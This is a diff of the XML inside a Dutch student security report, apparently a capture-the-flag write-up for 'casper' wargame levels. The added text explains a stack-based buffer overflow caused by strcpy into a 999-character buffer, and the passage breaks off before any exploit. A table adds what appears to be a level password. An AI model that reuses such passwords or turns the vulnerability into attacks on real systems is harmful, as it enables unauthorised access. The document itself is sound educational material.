+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Inhopg2">
+    <w:name w:val="toc 2"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:next w:val="Standaard"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B45677"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="220"/>
+    </w:pPr>
   </w:style>
 </w:styles>
 </file>
@@ -974,19 +3627,19 @@
 
 <file path=word/glossary/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
 <w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
+  <w:font w:name="Times New Roman">
+    <w:panose1 w:val="02020603050405020304"/>
+    <w:charset w:val="00"/>
+    <w:family w:val="roman"/>
+    <w:pitch w:val="variable"/>
+    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+  </w:font>
   <w:font w:name="Calibri">
     <w:panose1 w:val="020F0502020204030204"/>
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
     <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Times New Roman">
-    <w:panose1 w:val="02020603050405020304"/>
-    <w:charset w:val="00"/>
-    <w:family w:val="roman"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Calibri Light">
     <w:panose1 w:val="020F0302020204030204"/>
@@ -1014,7 +3667,7 @@
   </w:compat>
   <w:rsids>
     <w:rsidRoot w:val="007B5ECD"/>
-    <w:rsid w:val="00046845"/>
+    <w:rsid w:val="00183736"/>
     <w:rsid w:val="007B5ECD"/>
   </w:rsids>
   <m:mathPr>
@@ -1799,10 +4452,22 @@
 </CoverPageProperties>
 </file>
 
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/coverPageProps"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A779DE11-4DEB-46F9-B1F4-E2199CC410CF}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/verslag/verslag_dev_Sec.docx
+++ b/verslag/verslag_dev_Sec.docx
@@ -10,6 +10,7 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p/>
         <w:tbl>
@@ -45,6 +46,7 @@
                 <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties'" w:xpath="/ns0:Properties[1]/ns0:Company[1]" w:storeItemID="{6668398D-A668-4E3E-A5EB-62B293D839F1}"/>
                 <w:text/>
               </w:sdtPr>
+              <w:sdtEndPr/>
               <w:sdtContent>
                 <w:tc>
                   <w:tcPr>
@@ -117,6 +119,7 @@
                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                   <w:text/>
                 </w:sdtPr>
+                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -157,9 +160,11 @@
                 <w:placeholder>
                   <w:docPart w:val="ED513E90EE80484F9E1F77A4217F4244"/>
                 </w:placeholder>
+                <w:showingPlcHdr/>
                 <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                 <w:text/>
               </w:sdtPr>
+              <w:sdtEndPr/>
               <w:sdtContent>
                 <w:tc>
                   <w:tcPr>
@@ -184,9 +189,9 @@
                         <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                         <w:sz w:val="24"/>
                         <w:szCs w:val="24"/>
-                        <w:lang w:val="en-GB"/>
+                        <w:lang w:val="nl-NL"/>
                       </w:rPr>
-                      <w:t xml:space="preserve">   </w:t>
+                      <w:t>[Ondertitel van document]</w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
@@ -229,6 +234,7 @@
                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                   <w:text/>
                 </w:sdtPr>
+                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -271,6 +277,7 @@
                     <w:calendar w:val="gregorian"/>
                   </w:date>
                 </w:sdtPr>
+                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -338,6 +345,10 @@
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
           <w:lang w:val="nl-NL"/>
         </w:rPr>
         <w:id w:val="-397435431"/>
@@ -348,13 +359,8 @@
       </w:sdtPr>
       <w:sdtEndPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
         </w:rPr>
       </w:sdtEndPr>
       <w:sdtContent>
@@ -378,7 +384,6 @@
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
-              <w:lang/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -458,7 +463,6 @@
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
-              <w:lang/>
             </w:rPr>
           </w:pPr>
           <w:hyperlink w:anchor="_Toc25519920" w:history="1">
@@ -873,7 +877,6 @@
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
-              <w:lang/>
             </w:rPr>
           </w:pPr>
           <w:hyperlink w:anchor="_Toc25519926" w:history="1">
@@ -1338,9 +1341,9 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="2616"/>
+        <w:gridCol w:w="2606"/>
         <w:gridCol w:w="3888"/>
-        <w:gridCol w:w="2522"/>
+        <w:gridCol w:w="2532"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1405,6 +1408,26 @@
               <w:t>Tijd</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>uur</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1471,7 +1494,13 @@
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1479,11 +1508,11 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
@@ -1492,7 +1521,13 @@
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t>casper40</w:t>
+              <w:t>casper4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1502,12 +1537,17 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="1"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>JkZv4uouYkyOP3e1JQwPr4BP6VvcJTWz</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1516,6 +1556,112 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>0.5</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>c</w:t>
+            </w:r>
+            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="1"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>asper6</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
@@ -1567,91 +1713,6 @@
           </w:p>
         </w:tc>
       </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3005" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3005" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3006" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3005" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3005" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3006" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -1683,6 +1744,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop1"/>
+        <w:jc w:val="both"/>
       </w:pPr>
       <w:bookmarkStart w:id="2" w:name="_Toc25519920"/>
       <w:r>
@@ -1693,6 +1755,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
@@ -1710,68 +1773,980 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het casper4 programma vereist </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">één parameter als input. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Allereerst wordt er nagekeken of er een parameter meegegeven wordt. Indien dit niet het geval is gaat het een error bericht: “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Usage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>: /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>casper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/casper4 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>YourName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>teruggeve</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Vervolgens stopt het programma met een errorcode 1.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Indien er wel een parameter meegegeven wordt gaat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie opgeroepen worden met de meegegeven input.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze functie maakt een buffer aan van 999 karakters en gaat vervolgens de meegegeven input </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>kopiëren</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> naar deze buffer.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Tot slot print het “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Hello</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” gevolgd door de inhoud van de buffer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="4" w:name="_Toc25519922"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Vulnerability</w:t>
       </w:r>
       <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Dit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> level </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>bevat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>een</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stack-based buffer overflow</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>In de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>reetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie wordt er gebruik gemaakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” functie. Deze kopieer functie gaat de input </w:t>
+      </w:r>
+      <w:r>
